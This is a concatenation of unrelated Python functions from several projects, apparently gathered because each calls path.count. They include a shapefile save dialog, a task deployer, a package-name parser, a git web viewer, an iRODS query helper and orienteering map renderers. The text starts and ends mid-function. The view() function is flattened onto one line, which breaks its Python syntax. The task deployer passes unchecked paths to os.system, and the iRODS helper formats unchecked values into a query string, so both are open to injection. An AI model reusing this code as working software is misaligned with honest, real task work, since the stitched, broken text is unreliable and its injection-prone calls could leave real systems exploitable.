        # trying to add ".shp" to the end of the path if it is not included
        path = path.strip()
        if path.rfind(".shp") != (len(path) - len(".shp")):
            if path.rfind(".") != (len(path) - 1):
                path += ".shp"
            else:
                # Path already ends with '.': just append the extension body.
                path += "shp"
        if path.count(".") > 1:
            pa.MessageBox(msgDict["FileNameErr"], "Error")
            return None
        return path
    except Exception as e:
        printErrorMessage(e)
        return None
def savePath():
    """Prompt for a shapefile save path and normalise it to end in '.shp'.

    Returns the chosen path, or None when the dialog is cancelled, the
    name contains more than one dot (rejected with an error box), or an
    exception occurs (reported via printErrorMessage).
    """
    try:
        path = pa.SaveDialog(msgDict["SaveDialog"], "", "~/")
        if path is None:
            return None
        # trying to add ".shp" to the end of the path if it is not included
        path = path.strip()
        if path.rfind(".shp") != (len(path) - len(".shp")):
            if path.rfind(".") != (len(path) - 1):
                path += ".shp"
            else:
                # Path already ends with '.': just append the extension body.
                path += "shp"
        if path.count(".") > 1:
            pa.MessageBox(msgDict["FileNameErr"], "Error")
            return None
        return path
    except Exception as e:
        printErrorMessage(e)
        return None
def execute(self):
    """Deploy this task's resources into its working root on the node.

    Recreates the root directory, registers the process with the node,
    unpacks the local-resource tarball when configured, moves any .py
    modules from the configured modulepath up to the root, and appends
    the root to *path* -- NOTE(review): here `path` is a module-level
    list used as an import search path (count/append), presumably
    sys.path -- confirm.
    """
    self.display( OUTPUT_DEBUG, 'deploy task execuiting under %s' % self._root )
    # Start from a clean working directory.
    rmtree( self._root + '/', ignore_errors=True )
    system( 'mkdir -p %s/' % self._root )
    if not self.pid in self.node._procs:
        self.display( OUTPUT_DEBUG, 'adding process to node list' )
        self.node._procs[ self.pid ] = self._root
    if 'general' in self._config and 'localresources' in self._config['general']:
        self.display( OUTPUT_DEBUG, 'setting up local resources' )
        cwd = getcwd()
        chdir( self._root )
        # Unpack the resource tarball shipped alongside the root.
        fname = '%s.tar.gz' % self._root
        system( 'tar zxf %s' % fname )
        #tf = TarFile.open( self._root + '.tar.gz' )
        #tf.extractall( self._root + '/' )
        #tf.close()
        chdir( cwd )
        remove( self._root + '.tar.gz' )
        if 'modulepath' in self._config['general']:
            # Promote deployed python modules to the root directory.
            files = listdir( self._root + '/' + self._config['general']['modulepath'] )
            for f in files:
                if f.endswith( '.py' ):
                    move( self._root + '/' + self._config['general']['modulepath'] + '/' + f, self._root )
            # Make the deployed modules importable.
            if path.count( self._root ) == 0:
                path.append( self._root )
    self.display( OUTPUT_DEBUG, 'process %d resources deployed.' % self.owner )
    self._config = None
    self.state = SUCCESS
def run(self):
    """Worker thread body: walk self.path, wrap each directory in a Node,
    and push it onto self.data_queue; a None sentinel marks completion.

    Returns early -- without pushing the sentinel -- when self.stop_event
    is set.
    """
    startinglevel = self.path.count(os.sep)
    for path, dirs, files in os.walk(self.path):
        if self.stop_event.is_set():
            self.logger.error("Program unexpectedly aborted...exiting thread")
            return
        # Depth of this directory relative to the walk root.
        depth = path.count(os.sep) - startinglevel
        node = Node(path, depth, dirs, files)
        self.logger.debug(node.path)
        self.logger.debug(node.depth)
        self.logger.debug(node.dirs)
        self.logger.debug(node.files)
        self.data_queue.put(node)
        self.logger.debug("%s::%s - Items in queue %d", self.__class__.__name__,
                          self.getName(), self.data_queue.qsize())
    self.logger.info(" %s::%s is finished", self.__class__.__name__, self.getName())
    # Object that signals shutdown
    _sentinel = None
    self.data_queue.put(_sentinel)
def extension(path):
    """Get the file extension of the last part of a path.

    A file extension is any part after the last dot inclusively.

    @param path: The path to split.
    @type path: string
    @return: The extension part of the path.
    @rtype: string
    """
    # Start of the final path component: just past the last slash of
    # either kind (rfind's -1 on a miss becomes 0 after the +1).
    start = path.rfind("\\")
    start = max(path.rfind("/", start + 1), start) + 1
    dot = path.rfind(".", start)
    # A genuine extension requires the dot not to be the component's
    # first character and the prefix not to be all dots.
    if dot > start and path.count(".", start, dot) != dot - start:
        return path[dot:]
    return ""
def guess_pkgname_and_version(path):
    """Split a distribution filename into (pkgname, version).

    Wheels are delegated to _guess_pkgname_and_version_wheel(); returns
    None when the filename has no recognised archive suffix (module-level
    _archive_suffix_rx).

    Bug fix: a trailing '.asc' (detached signature) was removed with
    str.rstrip(".asc"), which strips any run of the *characters*
    '.', 'a', 's', 'c' from the end and can eat into the real filename
    (e.g. "foo.csa.asc" -> "foo"); slicing off the exact suffix is the
    correct operation.
    """
    path = os.path.basename(path)
    if path.endswith(".asc"):
        path = path[:-len(".asc")]
    if path.endswith(".whl"):
        return _guess_pkgname_and_version_wheel(path)
    if not _archive_suffix_rx.search(path):
        return
    path = _archive_suffix_rx.sub('', path)
    if '-' not in path:
        pkgname, version = path, ''
    elif path.count('-') == 1:
        pkgname, version = path.split('-', 1)
    elif '.' not in path:
        # Several dashes but no dots: version is the last dash component.
        pkgname, version = path.rsplit('-', 1)
    else:
        # Split the name at the first version-like token.
        pkgname = _pkgname_re.split(path)[0]
        ver_spec = path[len(pkgname) + 1:]
        parts = _pkgname_parts_re.split(ver_spec)
        version = parts[0]
    return pkgname, version
def view(request,path="",sha="master"): ''' view the path/file/page at a given commit note: if it's a folder, return the index view. ''' #check if the path is a path or if the path is a file if path: if not path_is_file(path=path,sha=sha): return index(request,path=path,sha=sha) repo = git.Repo(settings.REPO_DIR) commits = repo.commits(start=sha,max_count=1) head = commits[0] files = head.tree.items() returncontents = "" stop = False cur_tree = head.tree while not stop: check = False name = cur_tree.name if not name: name = "" #or "/" if path.count("/") == 0: #check = cur_tree.__dict__["_contents"].has_key(path) check2 = (cur_tree.keys()).count(path) #is "path" a file in this tree? if check2 == 0: check = False #path is not a file in this tree else: check = True #ok, it is checkthing = path #in the case of a file, checkthing needs to be the path else: if not hasattr(cur_tree.__dict__["_contents"], "has_key"): raise Http404() check = cur_tree.__dict__["_contents"].has_key(pop_path_rev(copy.copy(path))) # checkthing = pop_path_rev(path) #in the case of a folder, checkthing needs to be the remaining path as we travel down the rabbit hole if check and not name == checkthing: #we don't have what we want, and it's a valid key, so let's setup the next step in the while loop cur_tree = cur_tree[checkthing] path = pop_path(path) if type(cur_tree) == git.blob.Blob: stop = True #stop if we have our file (by definition we can't go deeper anyway) elif name == checkthing: stop = True #we have what we want, let's roll. if type(cur_tree) == git.blob.Blob: returncontents = cur_tree.data return django.shortcuts.render_to_response("view.html", locals())
def _iquestw(path, orig_path):
    """Expand SQL wildcards in *path* by querying the iRODS catalog.

    Looks up data objects (when *path* has no trailing '/') or
    collections (when it does), filters results to the same collection
    depth as the query, and falls back to [orig_path] when nothing
    matches.

    Bug fix: *collections* was only assigned in the trailing-slash
    branch, so a data-object query raised NameError on the final
    concatenation; it is now initialised to [] alongside *files*.
    """
    path_slashes = path.count("/")

    def _filter(e):
        ret = []
        # empty result
        if "CAT_NO_ROWS_FOUND" in e:
            return []
        # remove query results which contain more "/" characters than the
        # original query because they aren't on the same collection depth
        # we asked for
        for p in e.strip().split("\n"):
            if p.count("/") == path_slashes:
                ret.append(p)
        return ret

    iquest = IrodsCommand("iquest", ["--no-page"], output_filter=_filter, verbose=False)
    coll, name = os.path.split(path)
    files = []
    collections = []
    # look for data objects (files)
    if not path.endswith("/"):
        _returncode, files = iquest(
            ["%s/%s",
             "select COLL_NAME, DATA_NAME where COLL_NAME like '%s' AND DATA_NAME like '%s'" % (coll, name)])
    # look for collections (directories)
    if path.endswith("/"):
        path = path[:-1]
        path_slashes -= 1
        _returncode, collections = iquest(
            ["%s", "select COLL_NAME where COLL_NAME like '%s' " % (path,)])
    return (files + collections) or [orig_path]
def _find(self, path):
    """Resolve a request *path* to an open file object (static content)
    or a template, trying in order: exact file match, exact '<path>.ks'
    template, then parameterized ('%name') path matches scored by
    self._score_candidates.

    Returns None when nothing matches or the target is hidden
    (HIDDEN_EXTS / HIDDEN_PREFIXES module constants).
    """
    if any(path.endswith(ext) for ext in HIDDEN_EXTS):
        return None
    if path.startswith('/'):
        path = path[1:]
    if path == '':
        path = 'index'
    # use urljoin, since it preserves the trailing /
    # that may be a part of path; since self.app_dir
    # was abspath'd, we must unconditionally add a
    # trailing slash to *it*, since the second arg
    # to urljoin is treated relative to the first
    fspath = urlparse.urljoin(self.app_dir + '/', path)
    # first: see if an exact match exists
    if os.path.isfile(fspath):
        filename = os.path.basename(fspath)
        if any(filename.startswith(pre) for pre in HIDDEN_PREFIXES):
            return None
        return file(fspath, 'rb')
    # next: see if an exact path match with
    # extension ".ks" exists, and load template
    fspath += '.ks'
    if os.path.isfile(fspath):
        return self.engine.get_template(path + '.ks')
    # finally: see if a parameterized path matches
    # the request path.
    candidates = []
    pathparts = path.split('/')
    pathdepth = path.count('/')
    for dirpath, dirnames, filenames in os.walk(self.app_dir):
        dirpath = dirpath[len(self.app_dir):]
        depth = dirpath.count('/')
        # Prune subdirectories that neither match the literal path part
        # at this depth nor are parameterized ('%...').
        for dirname in list(dirnames):
            if dirname == pathparts[depth]:
                continue
            if dirname.startswith('%'):
                continue
            dirnames.remove(dirname)
        if pathdepth == depth:
            dirpath = dirpath.lstrip('/')
            for filename in filenames:
                if filename.startswith('%'):
                    # Parameterized filename matches anything.
                    candidates.append(os.path.join(dirpath, filename))
                elif filename.endswith('.ks'):
                    if pathparts[-1] == '' and filename == 'index.ks' or \
                            filename == pathparts[-1] + '.ks':
                        candidates.append(os.path.join(dirpath, filename))
                elif filename == pathparts[-1]:
                    candidates.append(os.path.join(dirpath, filename))
    if not candidates:
        return None
    # Rank candidates; keep only the best-scoring ones.
    scores = self._score_candidates(path, candidates)
    maxscore = max(scores)
    candidates = [c for c, s in izip(candidates, scores) if s == maxscore]
    if len(candidates) > 1:
        # choose the first one alphabetically;
        # this is arbitrary, but consistent
        candidates.sort()
        warnings.warn(
            'Multiple parameterized paths matched: %r, choosing %r' %
            (candidates, candidates[0]))
    winner = candidates[0]
    if not winner.endswith('.ks'):
        # we've matched a static file with a wildcard
        # path, so just return a file object on it
        fspath = os.path.join(self.app_dir, winner)
        return file(fspath, 'rb')
    # Template match: extract '%name' URL parameters from the path.
    urlparams = {}
    for pathpart, urlpart in izip(path.split('/'), winner.split('/')):
        if urlpart.startswith('%'):
            name = urlpart[1:]
            if name.endswith('.ks'):
                name = name[:-3]
            urlparams[name] = pathpart
    template = self.engine.get_template(winner).copy()
    template.urlparams = urlparams
    return template
def createKMZ(path):
    """Render an OOM request string to a KMZ (Google Earth overlay).

    Renders the map as a JPEG via handlePDF.createImage, computes its
    WGS84 bounding box from the request's centre/scale/paper fields, and
    wraps the image in a KMZ GroundOverlay. Returns a NamedTemporaryFile
    holding the KMZ, or an error string for malformed input.

    NOTE(review): Python 2 only — the ``0100775`` octal literal below is
    py2 syntax. Relies on module globals: mapnik, math, os, time,
    EPSG900913, MAP_NM/MAP_EM/MAP_SM/MAP_WM.
    """
    import tempfile
    import zipfile
    from handlePDF import createImage
    from simplekml import Kml, Folder
    from simplekml.base import Kmlable

    class PermKml(Kml):
        # Subclass whose savekmz writes doc.kml with explicit zip
        # permissions (0775 via external_attr) instead of the defaults.
        def savekmz(self, path, format=True):
            Kmlable._currentroot = self
            self._outputkmz = True
            out = self._genkml(format).encode('utf-8')
            kmz = zipfile.ZipFile(path, 'w', zipfile.ZIP_DEFLATED)
            info = zipfile.ZipInfo("doc.kml")
            # High 16 bits of external_attr carry the Unix mode (0775 here).
            info.external_attr = 0100775 << 16
            info.date_time = time.localtime()
            kmz.writestr(info, out)
            for image in self._images:
                kmz.write(image, os.path.join('files', os.path.split(image)[1]))
            for image in self._foundimages:
                kmz.write(image, os.path.join('files', os.path.split(image)[1]))
            kmz.close()
    # Render the map image first (factor-2 resolution JPEG).
    jpgf = createImage(path, 'jpg', 2)
    global MAP_NM, MAP_EM, MAP_SM, MAP_WM
    # Validate the pipe-delimited request; pad a missing trailing field.
    if path.count("|") < 9 or path.count("|") > 10 or len(path) < 30:
        return "Incorrectly formatted string."
    if path.count("|") == 9:
        path = path + "|"
    style, paper, scale, centre, title, club, mapid, start, crosses, cps, controls = path.split("|")
    # Each field is "key=value"; keep only the value.
    paper = paper.split("=")[1]
    PAPER_W = float(paper.split(",")[0])
    PAPER_H = float(paper.split(",")[1])
    scale = int(scale.split("=")[1])
    centre = centre.split("=")[1]
    # Centre is given in spherical-mercator metres (see EPSG900913 use).
    clat = int(centre.split(",")[0])
    clon = int(centre.split(",")[1])
    projection = mapnik.Projection(EPSG900913)
    wgs84lat = mapnik.Coord(clon, clat).inverse(projection).y
    # Mercator metres are stretched by 1/cos(lat); correct the scale.
    scaleCorrectionFactor = math.cos(wgs84lat * math.pi/180)
    scaleCorrected = scale / scaleCorrectionFactor
    # Map area = paper minus the fixed margins.
    MAP_W = PAPER_W - MAP_WM - MAP_EM
    MAP_H = PAPER_H - MAP_NM - MAP_SM
    paperSLat = clat - (MAP_H/2+MAP_SM)*scaleCorrected
    paperNLat = clat + (MAP_H/2+MAP_NM)*scaleCorrected
    paperWLon = clon - (MAP_W/2+MAP_WM)*scaleCorrected
    paperELon = clon + (MAP_W/2+MAP_EM)*scaleCorrected
    # Symmetric bounding box centred on (clon, clat).
    XMin = clon - (paperELon - paperWLon)/2.0
    YMin = clat - (paperNLat - paperSLat)/2.0
    XMax = clon + (paperELon - paperWLon)/2.0
    YMax = clat + (paperNLat - paperSLat)/2.0
    # Convert the mercator corners back to WGS84 for the overlay box.
    north = mapnik.Coord(XMin, YMax).inverse(projection).y
    west = mapnik.Coord(XMin, YMax).inverse(projection).x
    south = mapnik.Coord(XMax, YMin).inverse(projection).y
    east = mapnik.Coord(XMax, YMin).inverse(projection).x
    kml = PermKml()
    kml.document = Folder(name="")
    # NOTE(review): fixed /tmp filename — concurrent requests would
    # clobber each other's tile; confirm whether that matters here.
    jpgfilename = '/tmp/tile_0_0.jpg'
    jpgfile = open(jpgfilename, 'wb')
    jpgfile.write(jpgf.read())
    jpgfile.flush()
    jpgfilepath = kml.addfile(jpgfilename)
    ground = kml.newgroundoverlay(name=os.path.split(jpgfilename)[1])
    ground.draworder = 75
    ground.icon.href = jpgfilepath
    ground.icon.viewboundscale = 0.75
    ground.latlonbox.north = north
    ground.latlonbox.south = south
    ground.latlonbox.east = east
    ground.latlonbox.west = west
    ground.latlonbox.rotation = 0
    kmzfile = tempfile.NamedTemporaryFile()
    kml.savekmz(kmzfile.name)
    return kmzfile
def createJPG(path):
    """Render an OOM request string to a JPEG map with adornments.

    Parses the 9/10-field pipe-delimited request, renders the mapnik map
    into a cairo surface, overlays start triangle / control circles /
    crosses and title, scale bar, north arrow, logo and attribution
    adornments, then converts the PNG to JPEG via PIL. Returns a
    NamedTemporaryFile holding the JPEG, or an error string.

    NOTE(review): Python 2 code (`urllib.unquote`, integer `/` used for
    list-length division below). Relies on module globals: mapnik, math,
    os, home, S2P, EPSG900913, the MAP_* margins and the ADORN_*/SC_*/
    C_*/CDOT_R/CTEXT_S/CONTENT_NM layout constants.
    """
    import tempfile
    import cairo
    import urllib
    from PIL import Image
    # Specifically declare these as global, as we may change them.
    global MAP_NM, MAP_EM, MAP_SM, MAP_WM
    if path.count("|") < 8 or path.count("|") > 9 or len(path) < 30:
        return "Incorrectly formatted string."
    if path.count("|") == 8:
        path = path + "|"
    style, paper, scale, centre, title, club, mapid, start, crosses, controls = path.split("|")
    style = style.split("=")[1]
    # Whitelist of renderable styles.
    if style != "crew" and style != 'blueprint' and style != "urban_skeleton" and style != "streeto" and style != "oterrain" and style != "streeto_norail" and style != "adhoc" and style != "streeto_ioa" and style != "oterrain_ioa" and style != "streeto_norail_ioa" and style != 'streeto_global' and style != 'streeto_norail_global' and style != 'oterrain_global':
        return "Unknown style."
    paper = paper.split("=")[1]
    PAPER_W = float(paper.split(",")[0])
    PAPER_H = float(paper.split(",")[1])
    scale = int(scale.split("=")[1])
    centre = centre.split("=")[1]
    # Centre/start/control coordinates are in spherical-mercator metres.
    clat = int(centre.split(",")[0])
    clon = int(centre.split(",")[1])
    title = title.split("=")[1]
    slon = 0
    slat = 0
    start = start.split("=")[1]
    if len(start) > 0:
        slat = int(start.split(",")[0])
        slon = int(start.split(",")[1])
    controlsArr = []
    controls = controls.split("=")[1]
    if len(controls) > 0:
        controlsArr = controls.split(",")
    crossesArr = []
    crosses = crosses.split("=")[1]
    if len(crosses) > 0:
        crossesArr = crosses.split(",")
    if mapid != "":
        mapid = mapid.split("=")[1]
    projection = mapnik.Projection(EPSG900913)
    wgs84lat = mapnik.Coord(clon, clat).inverse(projection).y
    # Mercator metres are stretched by 1/cos(lat); correct the scale.
    scaleCorrectionFactor = math.cos(wgs84lat * math.pi/180)
    scaleCorrected = scale / scaleCorrectionFactor
    if style == "adhoc":
        # adhoc maps use the narrow west margin on all four sides.
        MAP_EM = MAP_WM
        MAP_NM = MAP_WM
        MAP_SM = MAP_WM
    MAP_W = PAPER_W - MAP_WM - MAP_EM
    MAP_H = PAPER_H - MAP_NM - MAP_SM
    mapSLat = clat - (MAP_H/2)*scaleCorrected
    mapNLat = clat + (MAP_H/2)*scaleCorrected
    mapWLon = clon - (MAP_W/2)*scaleCorrected
    mapELon = clon + (MAP_W/2)*scaleCorrected
    styleFile = home + "/styles/" + style + ".xml"
    cbbox = mapnik.Box2d(mapWLon, mapSLat, mapELon, mapNLat)
    # Limit the size of map we are prepared to produce
    if PAPER_W * PAPER_H > 0.25 and style != "adhoc":  # Roughly A2 size.
        return "Map too large. Try increasing the scale value or using a smaller paper size."
    if scale > 50000 and style != "adhoc":
        return "Scale too small. Try using a lower scale value."
    # Create map
    map = mapnik.Map(int(MAP_W*S2P), int(MAP_H*S2P))
    # Load map configuration
    mapnik.load_map(map, styleFile)
    # Zoom the map to the bounding box
    map.zoom_to_box(cbbox)
    file = tempfile.NamedTemporaryFile()
    surface = cairo.ImageSurface(cairo.FORMAT_ARGB32, int(PAPER_W*S2P), int(PAPER_H*S2P))
    # Adornments - Title swoosh back
    ctx = cairo.Context(surface)
    ctx.translate(0, 0)
    ctx.set_line_width(1)
    ctx.move_to(0, 0)
    ctx.rel_line_to(0, 0.25*PAPER_H*S2P)
    ctx.rel_line_to(0.2*PAPER_W*S2P, 0)
    ctx.rel_line_to(0.4*PAPER_W*S2P, -0.25*PAPER_H*S2P)
    ctx.close_path()
    ctx.set_source_rgb(0.91, 0.15, 0.28)
    if style == "oterrain_ioa" or style == "streeto_ioa" or style == "streeto_norail_ioa":
        # IOA styles use green instead of red.
        ctx.set_source_rgb(0.12, 0.53, 0.27)
    if style != 'blueprint':
        ctx.fill()
    # Adornments - Attrib swoosh back
    ctx = cairo.Context(surface)
    ctx.translate(0, 0)
    ctx.set_line_width(1)
    ctx.move_to(PAPER_W*S2P, PAPER_H*S2P)
    ctx.rel_line_to(0, -0.25*PAPER_H*S2P)
    ctx.rel_line_to(-0.2*PAPER_W*S2P, 0)
    ctx.rel_line_to(-0.4*PAPER_W*S2P, 0.25*PAPER_H*S2P)
    ctx.close_path()
    ctx.set_source_rgb(0.12, 0.4, 0.67)
    if style == "oterrain_ioa" or style == "streeto_ioa" or style == "streeto_norail_ioa":
        ctx.set_source_rgb(0.89, 0.44, 0.24)
    if style != "blueprint":
        ctx.fill()
    # Background map
    ctx = cairo.Context(surface)
    ctx.translate(MAP_WM*S2P, MAP_NM*S2P)
    mapnik.render(map, ctx)
    if style == "adhoc":
        # adhoc: just stamp the request string under the map and return
        # the PNG directly (no overlays/adornments, no JPEG conversion).
        ctx = cairo.Context(surface)
        ctx.set_source_rgb(1, 1, 1)
        ctx.select_font_face("Arial", cairo.FONT_SLANT_NORMAL, cairo.FONT_WEIGHT_NORMAL)
        ctx.set_font_size(0.5)
        text = path
        ctx.translate(MAP_WM*S2P, (MAP_NM+MAP_H+0.001)*S2P)
        ctx.show_text(text)
        surface.write_to_png(file.name)
        return file
    # Start control (triangle), drawn only if a start was supplied
    if slon != 0 and slat != 0:
        ctx = cairo.Context(surface)
        ctx.set_line_width(SC_T*S2P)
        ctx.set_line_join(cairo.LINE_JOIN_ROUND)
        ctx.set_source_rgb(1, 0, 1)
        ctx.translate((MAP_WM+((slon-mapWLon)/scaleCorrected))*S2P, (MAP_NM+((mapNLat-slat)/scaleCorrected))*S2P)
        ctx.move_to(0, -0.577*SC_W*S2P)
        ctx.rel_line_to(-0.5*SC_W*S2P, 0.866*SC_W*S2P)
        ctx.rel_line_to(SC_W*S2P, 0)
        ctx.close_path()
        ctx.stroke()
    # Controls and labels
    if len(controlsArr) > 0:
        ctx = cairo.Context(surface)
        ctx.set_source_rgb(1, 0, 1)
        ctx.select_font_face("Arial", cairo.FONT_SLANT_NORMAL, cairo.FONT_WEIGHT_NORMAL)
        ctx.set_font_size(CTEXT_S*S2P)
        # Controls come as flat 4-tuples: code, labelAngle, lat, lon.
        # (py2 integer division)
        numControls = len(controlsArr)/4
        for i in range(numControls):
            text = controlsArr[4*i]
            labelAngle = float(controlsArr[4*i+1])
            controllat = float(controlsArr[4*i+2])
            controllon = float(controlsArr[4*i+3])
            # Convert mercator metres to paper position.
            controllatP = MAP_NM+((mapNLat-controllat)/scaleCorrected)
            controllonP = MAP_WM+((controllon-mapWLon)/scaleCorrected)
            ctx.move_to((controllonP+C_R)*S2P, controllatP*S2P)
            ctx.set_line_width(C_T*S2P)
            ctx.arc(controllonP*S2P, controllatP*S2P, C_R*S2P, 0, 2*math.pi)
            ctx.stroke()
            ctx.move_to((controllonP+CDOT_R)*S2P, controllatP*S2P)
            ctx.arc(controllonP*S2P, controllatP*S2P, CDOT_R*S2P, 0, 2*math.pi)
            ctx.fill()
            x_bearing, y_bearing, width, height = ctx.text_extents(text)[:4]
            # Place the label at the requested angle off the circle.
            labelX = C_R*2.5*math.sin(math.pi*labelAngle/180)
            labelY = C_R*2.5*math.cos(math.pi*labelAngle/180)
            ctx.move_to((controllonP+labelX)*S2P-width/2, (controllatP-labelY)*S2P+height/2)
            ctx.show_text(text)
    # Crosses and labels
    if len(crossesArr) > 0:
        ctx = cairo.Context(surface)
        ctx.set_source_rgb(1, 0, 1)
        ctx.select_font_face("Arial", cairo.FONT_SLANT_NORMAL, cairo.FONT_WEIGHT_BOLD)
        ctx.set_font_size(CTEXT_S*S2P/1.5)
        ctx.set_source_rgb(1, 0, 0)
        # Crosses come as flat lat,lon pairs. (py2 integer division)
        numCrosses = len(crossesArr)/2
        for i in range(numCrosses):
            text = "X"
            controllat = float(crossesArr[2*i])
            controllon = float(crossesArr[2*i+1])
            controllatP = MAP_NM+((mapNLat-controllat)/scaleCorrected)
            controllonP = MAP_WM+((controllon-mapWLon)/scaleCorrected)
            #ctx.move_to((controllonP)*S2P, controllatP*S2P)
            x_bearing, y_bearing, width, height = ctx.text_extents(text)[:4]
            #labelX = C_R*2.5*math.sin(math.pi*labelAngle/180)
            #labelY = C_R*2.5*math.cos(math.pi*labelAngle/180)
            ctx.move_to((controllonP)*S2P-width/2, (controllatP)*S2P+height/2)
            ctx.show_text(text)
    # Adornments - Title
    ctx = cairo.Context(surface)
    ctx.select_font_face("Arial", cairo.FONT_SLANT_ITALIC, cairo.FONT_WEIGHT_NORMAL)
    if style == 'blueprint':
        ctx.select_font_face("Impact", cairo.FONT_SLANT_NORMAL, cairo.FONT_WEIGHT_NORMAL)
    text = urllib.unquote(title)
    # Shrink the title font for long titles so it fits the swoosh.
    if len(text) > 28:
        ctx.set_font_size(15)
    elif len(text) > 20:
        ctx.set_font_size(18)
    else:
        ctx.set_font_size(21)
    ctx.translate(MAP_WM*S2P, (MAP_NM-ADORN_TITLE_SM)*S2P)
    if style == 'blueprint':
        ctx.set_source_rgb(0, 0.5, 0.8)
    else:
        ctx.set_source_rgb(1, 1, 1)
    ctx.show_text(text.upper())
    # Adornments - Scale Text
    ctx = cairo.Context(surface)
    ctx.select_font_face("Arial", cairo.FONT_SLANT_NORMAL, cairo.FONT_WEIGHT_NORMAL)
    text = "scale 1:" + str(scale)
    if style == "oterrain" or style == "streeto" or style == "streeto_norail":
        text = "scale 1:" + str(scale) + ", contours 10m"
    ctx.set_font_size(11)
    width = ctx.text_extents(text)[4]
    ctx.translate((MAP_WM+MAP_W)*S2P-width-(ADORN_ARROW_W+ADORN_LOGO_W)*S2P, (MAP_NM-ADORN_SCALE_SM)*S2P)
    ctx.show_text(text)
    # Adornments - Scale Bar and Caption
    ctx = cairo.Context(surface)
    ctx.select_font_face("Arial", cairo.FONT_SLANT_NORMAL, cairo.FONT_WEIGHT_NORMAL)
    scaleBarMetres = 500
    if scale < 10000:
        scaleBarMetres = 200
    text = str(scaleBarMetres) + "m"
    ctx.set_font_size(7)
    width = ctx.text_extents(text)[4]
    barCaptionX = (MAP_WM+MAP_W-(ADORN_ARROW_W+ADORN_LOGO_W))*S2P-width
    ctx.translate(barCaptionX, (MAP_NM-ADORN_SCALEBAR_SM)*S2P)
    ctx.show_text(text)
    ctx.set_line_width(0.5)
    # Bar length on paper = real metres / scale.
    scaleBarW = scaleBarMetres/float(scale)
    ctx.move_to((-scaleBarW-ADORN_SCALEBAR_PADDING)*S2P, 0)
    ctx.rel_line_to(0, -ADORN_SCALEBAR_LARGETICK*S2P)
    ctx.rel_line_to(0, ADORN_SCALEBAR_LARGETICK*S2P)
    ctx.rel_line_to(scaleBarW*S2P/2, 0)
    ctx.rel_line_to(0, -ADORN_SCALEBAR_SMALLTICK*S2P)
    ctx.rel_line_to(0, ADORN_SCALEBAR_SMALLTICK*S2P)
    ctx.rel_line_to(scaleBarW*S2P/2, 0)
    ctx.rel_line_to(0, -ADORN_SCALEBAR_LARGETICK*S2P)
    ctx.stroke()
    # Adornments - North Arrow
    ctx = cairo.Context(surface)
    # NOTE(review): reuses `width` from the scale-bar caption above —
    # looks intentional (arrow sits left of the logo) but confirm.
    ctx.translate((MAP_WM+MAP_W-ADORN_LOGO_W)*S2P-width, CONTENT_NM*S2P)
    ctx.set_line_width(1)
    ctx.move_to(0, 0)
    ctx.line_to(0.001*S2P, 0.002*S2P)
    ctx.line_to(-0.001*S2P, 0.002*S2P)
    ctx.close_path()
    ctx.fill()
    ctx.move_to(0, 0.001*S2P)
    ctx.line_to(0, 0.008*S2P)
    ctx.stroke()
    ctx.set_line_join(cairo.LINE_JOIN_ROUND)
    ctx.set_line_cap(cairo.LINE_CAP_ROUND)
    # The "N" glyph drawn as strokes.
    ctx.move_to(-0.001*S2P, 0.005*S2P)
    ctx.rel_line_to(0, -0.002*S2P)
    ctx.rel_line_to(0.002*S2P, 0.002*S2P)
    ctx.rel_line_to(0, -0.002*S2P)
    ctx.stroke()
    # Adornments - Logo (per style family)
    if style == "oterrain_ioa" or style == "streeto_ioa" or style == "streeto_norail_ioa":
        logoSurface = cairo.ImageSurface.create_from_png(home + "/images/ioalogo.png")
        ctx = cairo.Context(surface)
        width = logoSurface.get_width()*ADORN_LOGO_SCALE_IOA
        ctx.translate((MAP_WM+MAP_W)*S2P-width, CONTENT_NM*S2P)
        ctx.scale(ADORN_LOGO_SCALE_IOA, ADORN_LOGO_SCALE_IOA)
        ctx.set_source_surface(logoSurface, 0, 0)
        ctx.paint()
    elif style == "oterrain" or style == "streeto" or style == "streeto_norail":
        logoSurface = cairo.ImageSurface.create_from_png(home + "/images/boflogo.png")
        ctx = cairo.Context(surface)
        width = logoSurface.get_width()*ADORN_LOGO_SCALE
        ctx.translate((MAP_WM+MAP_W)*S2P-width, CONTENT_NM*S2P)
        ctx.scale(ADORN_LOGO_SCALE, ADORN_LOGO_SCALE)
        ctx.set_source_surface(logoSurface, 0, 0)
        ctx.paint()
    elif style == "blueprint":
        logoSurface = cairo.ImageSurface.create_from_png(home + "/images/blueprintlogo.png")
        ctx = cairo.Context(surface)
        width = logoSurface.get_width()*ADORN_LOGO_SCALE
        ctx.translate((MAP_WM+MAP_W)*S2P-width, CONTENT_NM*S2P)
        ctx.scale(ADORN_LOGO_SCALE, ADORN_LOGO_SCALE)
        ctx.set_source_surface(logoSurface, 0, 0)
        ctx.paint()
    else:
        logoSurface = cairo.ImageSurface.create_from_png(home + "/images/globallogo.png")
        ctx = cairo.Context(surface)
        width = logoSurface.get_width()*ADORN_LOGO_SCALE
        ctx.translate((MAP_WM+MAP_W)*S2P-width, CONTENT_NM*S2P)
        ctx.scale(ADORN_LOGO_SCALE, ADORN_LOGO_SCALE)
        ctx.set_source_surface(logoSurface, 0, 0)
        ctx.paint()
    # Adornments - Attribution left line 1
    ctx = cairo.Context(surface)
    ctx.select_font_face("Arial", cairo.FONT_SLANT_ITALIC, cairo.FONT_WEIGHT_NORMAL)
    ctx.set_source_rgb(0.12, 0.4, 0.67)
    if style == 'blueprint':
        ctx.set_source_rgb(0, 0.5, 0.8)
    ctx.set_font_size(7)
    text = "Map data (c) OpenStreetMap and available under the Open Database Licence."
    ctx.translate((MAP_WM)*S2P, (MAP_NM+MAP_H+ADORN_ATTRIB_NM)*S2P)
    ctx.show_text(text)
    if style == "oterrain" or style == "streeto" or style == "streeto_norail":
        # Adornments - Attribution left line 2 (OS-derived styles only)
        ctx = cairo.Context(surface)
        ctx.select_font_face("Arial", cairo.FONT_SLANT_ITALIC, cairo.FONT_WEIGHT_NORMAL)
        ctx.set_source_rgb(0.12, 0.4, 0.67)
        ctx.set_font_size(7)
        text = "Contains Ordnance Survey data (c) Crown copyright & database right 2013."
        ctx.translate((MAP_WM)*S2P, (MAP_NM+MAP_H+ADORN_ATTRIB_NM+0.002)*S2P)
        ctx.show_text(text)
    # Adornments - Attribution left line 3
    ctx = cairo.Context(surface)
    ctx.select_font_face("Arial", cairo.FONT_SLANT_ITALIC, cairo.FONT_WEIGHT_NORMAL)
    ctx.set_source_rgb(0.12, 0.4, 0.67)
    ctx.set_font_size(7)
    text = "Service created by Oliver O'Brien. Make your own: http://oomap.co.uk/"
